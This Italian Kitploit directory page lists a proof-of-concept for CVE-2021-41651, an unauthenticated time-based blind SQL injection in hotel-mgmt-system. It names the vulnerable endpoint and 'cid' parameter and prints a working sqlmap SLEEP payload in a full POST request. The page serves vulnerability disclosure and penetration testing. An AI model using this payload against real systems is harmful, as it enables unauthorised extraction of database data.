Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41651 — Exploit proof-of-concept per CVE-2021-41651, che dimostra SQL injection cieca basata sul tempo non autenticata in hotel-mgmt-system tramite il parametro cid, consentendo l'estrazione di dati sensibili da MySQL. | Kitploit
Strumenti/GitHubGitHub/mobiusbinary/cve-2021-41651
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmobiusbinary/cve-2021-41651

CVE-2021-41651

Exploit proof-of-concept per CVE-2021-41651, che dimostra SQL injection cieca basata sul tempo non autenticata in hotel-mgmt-system tramite il parametro cid, consentendo l'estrazione di dati sensibili da MySQL.

Vedi Repository
14 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-41651

CVE-2021-41651 SQL Injection nel sistema hotel-mgmt-system

Il sistema hotel-mgmt-system è vulnerabile ad attacchi non autenticati di SQL Injection blind basata sul tempo.

Il parametro cid nella pagina /process_update_profile.php non sanitizza l'input dell'utente; un attaccante può estrarre dati sensibili dal database MySQL sottostante.

Link all'applicazione

hotel-mgmt-system

Componenti e parametri interessati

URL: /process_update_profile.php
PARAMETRO: cid

PoC

Payload SQLMAP

Parametro cid nella pagina /process_update_profile.php

Parameter: cid ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Se l'immagine della PoC non è chiara, fai clic sulla GIF che verrà caricata a una risoluzione migliore.

POC - CID

Scoperto da

Jason Colyvas
MOBIUSBINARY
23 settembre 2021

Scarica lo strumento